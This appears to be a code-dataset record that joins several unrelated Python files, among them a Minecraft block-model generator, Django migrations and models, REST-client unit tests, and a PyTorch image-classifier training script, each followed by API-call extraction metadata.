'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/grass_block_top',
'overlay': 'minecraft:block/grass_block_side_overlay',
'tint': True
})
direct_block_model(rm, 'betterfoliage:snowy_grass_block', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/snow',
'overlay': 'minecraft:block/grass_block_snow',
'tint': False
})
direct_block_model(rm, 'betterfoliage:mycelium', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/mycelium_top',
'overlay': 'minecraft:block/mycelium_side',
'tint': False
})
direct_block_model(rm, 'betterfoliage:podzol', {
'loader': 'betterfoliage:grass',
'dirt': 'minecraft:block/dirt',
'top': 'minecraft:block/podzol_top',
'overlay': 'minecraft:block/podzol_side',
'tint': False
})
def direct_block_model(rm: ResourceManager, location: utils.ResourceIdentifier, json: utils.Json):
res = utils.resource_location(rm.domain, location)
rm.write((*rm.resource_dir, 'assets', res.domain, 'models', 'block', res.path), json)
|
[
"mcresources.utils.resource_location"
] |
[((3477, 3521), 'mcresources.utils.resource_location', 'utils.resource_location', (['rm.domain', 'location'], {}), '(rm.domain, location)\n', (3500, 3521), False, 'from mcresources import utils\n')]
|
# Generated by Django 2.1.5 on 2019-03-06 18:20
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('recruitment', '0013_auto_20190306_1652'),
]
operations = [
migrations.CreateModel(
name='EvaluationQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField()),
('timestamp', models.DateTimeField(default=django.utils.timezone.localtime)),
('application_evaluation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='recruitment.ApplicationEvaluation')),
],
),
]
|
[
"django.db.models.DateTimeField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.AutoField"
] |
[((408, 501), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (424, 501), False, 'from django.db import migrations, models\n'), ((529, 547), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (545, 547), False, 'from django.db import migrations, models\n'), ((580, 641), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.localtime'}), '(default=django.utils.timezone.localtime)\n', (600, 641), False, 'from django.db import migrations, models\n'), ((687, 794), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""recruitment.ApplicationEvaluation"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'recruitment.ApplicationEvaluation')\n", (704, 794), False, 'from django.db import migrations, models\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2016 Open Permissions Platform Coalition
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
#
from mock import Mock
from tornado.httpclient import HTTPRequest
from chub.api import Resource
fetch = Mock()
world = Resource('world', fetch)
def setup_function(function):
fetch.reset_mock()
def test_root_resource():
assert world.path == 'world'
def test_one_level_sub_resource():
countries = world.countries
assert isinstance(countries, Resource)
assert countries.path == 'world/countries'
def test_methods():
country_getter = world.countries.get
assert not isinstance(country_getter, Resource)
continent = 'South America'
national_dance = 'Samba'
country_getter(continent=continent, national_dance=national_dance)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='GET',
request='world/countries',
continent=continent,
national_dance=national_dance)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
country_setter = world.countries.post
assert not isinstance(country_setter, Resource)
name = 'Utopia'
founder = '<NAME>'
country_setter(name=name, founder=founder)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='POST',
request='world/countries',
name=name,
founder=founder)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
def test_resource_item():
uk = world.countries['uk']
assert isinstance(uk, Resource)
assert uk.path == 'world/countries/uk'
def test_two_level_sub_resource():
uk_cities = world.countries['uk'].cities
assert isinstance(uk_cities, Resource)
assert uk_cities.path == 'world/countries/uk/cities'
london = uk_cities['london']
assert isinstance(london, Resource)
assert london.path == 'world/countries/uk/cities/london'
city_getter = uk_cities.get
assert not isinstance(city_getter, Resource)
location = 'north'
dialect = 'geordie'
city_getter(location=location, dialect=dialect)
kwargs = fetch.call_args[-1]
min_expected_kwargs = dict(method='GET',
request='world/countries/uk/cities',
location=location,
dialect=dialect)
for item in min_expected_kwargs.items():
assert item in kwargs.items()
def test_resource_with_hyphen():
world = Resource('world', fetch)
time_zones = world.countries.us['time-zones']
assert time_zones.path == 'world/countries/us/time-zones'
def test_resource_url_encode():
world = Resource('world', fetch)
bar = world['http://example.com/foo?name=bar']
assert bar.path == 'world/http%3A%2F%2Fexample.com%2Ffoo%3Fname%3Dbar'
def test_prepare_request():
world.secrets.prepare_request(auth_username='user',
auth_password='password')
world.secrets.get(subject='pyramid')
req = fetch.call_args[-1]['request']
assert isinstance(req, HTTPRequest)
assert req.auth_username == 'user'
assert req.auth_password == 'password'
|
[
"chub.api.Resource",
"mock.Mock"
] |
[((718, 724), 'mock.Mock', 'Mock', ([], {}), '()\n', (722, 724), False, 'from mock import Mock\n'), ((733, 757), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (741, 757), False, 'from chub.api import Resource\n'), ((3118, 3142), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (3126, 3142), False, 'from chub.api import Resource\n'), ((3302, 3326), 'chub.api.Resource', 'Resource', (['"""world"""', 'fetch'], {}), "('world', fetch)\n", (3310, 3326), False, 'from chub.api import Resource\n')]
|
# Imports here
import torch
from torch import nn
from torch import optim
from torchvision import datasets, transforms, models
import time
from collections import OrderedDict
import matplotlib.pyplot as plt
import torch.nn.functional as F
import numpy as np
# Build the network
class Network(nn.Module):
def __init__(self, input_size, hidden_sizes, output_size,
dropIn_p=0, dropHidden_p=0):
super().__init__()
# hidden layers tensors
self.hidden_layers = nn.ModuleList(
[nn.Linear(input_size, hidden_sizes[0])])
pair_hidden_sizes = zip(hidden_sizes[:-1], hidden_sizes[1:])
self.hidden_layers.extend([nn.Linear(h1, h2)
for h1, h2 in pair_hidden_sizes])
# outout layer tensor
self.output = nn.Linear(hidden_sizes[-1], output_size)
# dropout layer for input
self.dropoutIn = nn.Dropout(p=dropIn_p)
# dropout layer for each hidden layer
self.dropoutHidden = nn.Dropout(p=dropHidden_p)
def forward(self, x):
# Apply the in-drop layer on input layer
x = self.dropoutIn(x)
# Apply linear compinations and activation functions and hidden-drop layer
for hidden_layer in self.hidden_layers:
x = hidden_layer(x)
x = F.relu(x)
x = self.dropoutHidden(x)
# Apply the linear combination on the last hidden layer to get the logits (scores of output)
x = self.output(x)
# Apply good activation function to get high precision instead of softmax
x = F.log_softmax(x, dim=1)
return x
# Get classifier based on feature detectors (pre_trainned CNN model)
def get_classifier(pre_trained_model, hidden_sizes, output_size, dropIn_p=0, dropHidden_p=0):
# freeze the pre_trained parameters
for param in pre_trained_model.parameters():
param.requires_grad = False
input_size = pre_trained_model.classifier[0].state_dict()[
'weight'].shape[1]
print(f"input_size of features to the classifier: {input_size}")
print(f'hidden_sizes in classifier: {hidden_sizes}')
print(f"output_size of classes from the classifier: {output_size}")
print()
classifier = Network(input_size, hidden_sizes,
output_size, dropIn_p, dropHidden_p)
pre_trained_model.classifier = classifier
return pre_trained_model
# Build validation function
def validation(model, criterion, valid_loader, gpu):
valid_loss = 0
valid_accuracy = 0
device = torch.device(
'cuda:0' if torch.cuda.is_available() and gpu else 'cpu')
print(f'validation using device:{device}')
model.to(device)
model.eval()
# Iterate over batches
for images, labels in valid_loader:
images, labels = images.to(device), labels.to(device)
# forward pass
with torch.no_grad():
outputs = model.forward(images)
# calculate loss
loss = criterion(outputs, labels)
valid_loss += loss.item()
ps = torch.exp(outputs)
equality = (labels == ps.max(dim=1)[1])
valid_accuracy += equality.type(torch.float64).mean().item()
info = {'loss': valid_loss / len(valid_loader),
'accuracy': valid_accuracy / len(valid_loader)}
return info
# define Train the model function
def train(model, optimizer, criterion, trainloader, validloader, gpu, epochs=2, print_every=40):
device = torch.device(
'cuda:0' if torch.cuda.is_available() and gpu else 'cpu')
print(f'train using device:{device}')
model.to(device)
model.train()
running_loss = 0
steps = 0
start = time.time()
print('Training started...')
for e in range(epochs):
for images, labels in trainloader:
images, labels = images.to(device), labels.to(device)
# Clears the gradients of all optimized
optimizer.zero_grad()
# Forward pass
outputs = model.forward(images)
# Calculate loss error for training
loss = criterion(outputs, labels)
running_loss += loss.item()
steps += 1
# Computes the gradient of current tensor
loss.backward()
# Performs a single optimization step.
optimizer.step()
if steps % print_every == 0:
model.eval()
valid = validation(model, criterion, validloader, gpu)
train_loss = running_loss / print_every
print(f'epoch {e+1}/{epochs}')
print(f'trainning loss = {train_loss :0.4}')
print(f'valid loss = {valid["loss"] :0.4} ...',
f'valid accuracy = {valid["accuracy"] :0.4}')
print('.............................')
running_loss = 0
model.train()
time_elapsed = time.time() - start
print("\nTotal time: {:.0f}m {:.0f}s".format(
time_elapsed//60, time_elapsed % 60))
print('Training Finished...')
measurements = {'train_loss': train_loss,
'valid_loss': valid["loss"], 'valid_accuracy': valid["accuracy"]}
return measurements
|
[
"torch.nn.Dropout",
"time.time",
"torch.exp",
"torch.cuda.is_available",
"torch.nn.functional.log_softmax",
"torch.nn.Linear",
"torch.nn.functional.relu",
"torch.no_grad"
] |
[((3674, 3685), 'time.time', 'time.time', ([], {}), '()\n', (3683, 3685), False, 'import time\n'), ((813, 853), 'torch.nn.Linear', 'nn.Linear', (['hidden_sizes[-1]', 'output_size'], {}), '(hidden_sizes[-1], output_size)\n', (822, 853), False, 'from torch import nn\n'), ((913, 935), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropIn_p'}), '(p=dropIn_p)\n', (923, 935), False, 'from torch import nn\n'), ((1011, 1037), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropHidden_p'}), '(p=dropHidden_p)\n', (1021, 1037), False, 'from torch import nn\n'), ((1593, 1616), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['x'], {'dim': '(1)'}), '(x, dim=1)\n', (1606, 1616), True, 'import torch.nn.functional as F\n'), ((3055, 3073), 'torch.exp', 'torch.exp', (['outputs'], {}), '(outputs)\n', (3064, 3073), False, 'import torch\n'), ((4907, 4918), 'time.time', 'time.time', ([], {}), '()\n', (4916, 4918), False, 'import time\n'), ((1323, 1332), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (1329, 1332), True, 'import torch.nn.functional as F\n'), ((2880, 2895), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2893, 2895), False, 'import torch\n'), ((529, 567), 'torch.nn.Linear', 'nn.Linear', (['input_size', 'hidden_sizes[0]'], {}), '(input_size, hidden_sizes[0])\n', (538, 567), False, 'from torch import nn\n'), ((674, 691), 'torch.nn.Linear', 'nn.Linear', (['h1', 'h2'], {}), '(h1, h2)\n', (683, 691), False, 'from torch import nn\n'), ((2584, 2609), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2607, 2609), False, 'import torch\n'), ((3500, 3525), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3523, 3525), False, 'import torch\n')]
|
from django.db import models
from django.conf import settings
class Contact(models.Model):
user1 = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='user1')
user2 = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='user2')
@staticmethod
def get_contact(user1: settings.AUTH_USER_MODEL, user2: settings.AUTH_USER_MODEL):
try:
contact = Contact.objects.get(user1=user1, user2=user2)
except Contact.DoesNotExist:
try:
contact = Contact.objects.get(user1=user2, user2=user1)
except Contact.DoesNotExist:
return None
return contact
@staticmethod
def get_friends(user: settings.AUTH_USER_MODEL):
friends = []
for contact in Contact.objects.all():
if contact.user1 == user:
friends.append(contact.user2)
elif contact.user2 == user:
friends.append(contact.user1)
friends = sorted(friends, key=lambda user: user.last_name)
return friends
@staticmethod
def create_contact(user1: settings.AUTH_USER_MODEL, user2: settings.AUTH_USER_MODEL):
contact = Contact(user1=user1, user2=user2)
contact.save()
@staticmethod
def delete_contact(owner: settings.AUTH_USER_MODEL, del_friend: settings.AUTH_USER_MODEL):
Contact.objects.filter(user1=owner, user2=del_friend).delete()
Contact.objects.filter(user1=del_friend, user2=owner).delete()
class ContactRequest(models.Model):
sender = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='sender')
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='receiver')
is_active = models.BooleanField(blank=True, null=False, default=True)
def accept(self):
Contact.create_contact(self.sender, self.receiver)
self.is_active = False
self.save()
def decline(self):
self.is_active = False
self.save()
@staticmethod
def get_request(sender: settings.AUTH_USER_MODEL, receiver: settings.AUTH_USER_MODEL):
try:
contact_request = ContactRequest.objects.get(sender=sender, receiver=receiver, is_active=True)
except ContactRequest.DoesNotExist:
return None
return contact_request
@staticmethod
def create_request(sender: settings.AUTH_USER_MODEL, receiver: settings.AUTH_USER_MODEL):
try:
contact_request = ContactRequest(sender=sender, receiver=receiver)
contact_request.save()
except Exception as e:
return None
return contact_request
@staticmethod
def get_senders(user: settings.AUTH_USER_MODEL):
"""
Возвращает список поль-лей которые отправили запрос для user
:param user:
:return:
"""
return [request.sender for request in ContactRequest.objects.filter(receiver=user, is_active=True)]
|
[
"django.db.models.ForeignKey",
"django.db.models.BooleanField"
] |
[((105, 200), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""user1"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='user1')\n", (122, 200), False, 'from django.db import models\n'), ((209, 304), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""user2"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='user2')\n", (226, 304), False, 'from django.db import models\n'), ((1598, 1694), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""sender"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='sender')\n", (1615, 1694), False, 'from django.db import models\n'), ((1706, 1804), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE', 'related_name': '"""receiver"""'}), "(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n related_name='receiver')\n", (1723, 1804), False, 'from django.db import models\n'), ((1818, 1875), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'blank': '(True)', 'null': '(False)', 'default': '(True)'}), '(blank=True, null=False, default=True)\n', (1837, 1875), False, 'from django.db import models\n')]
|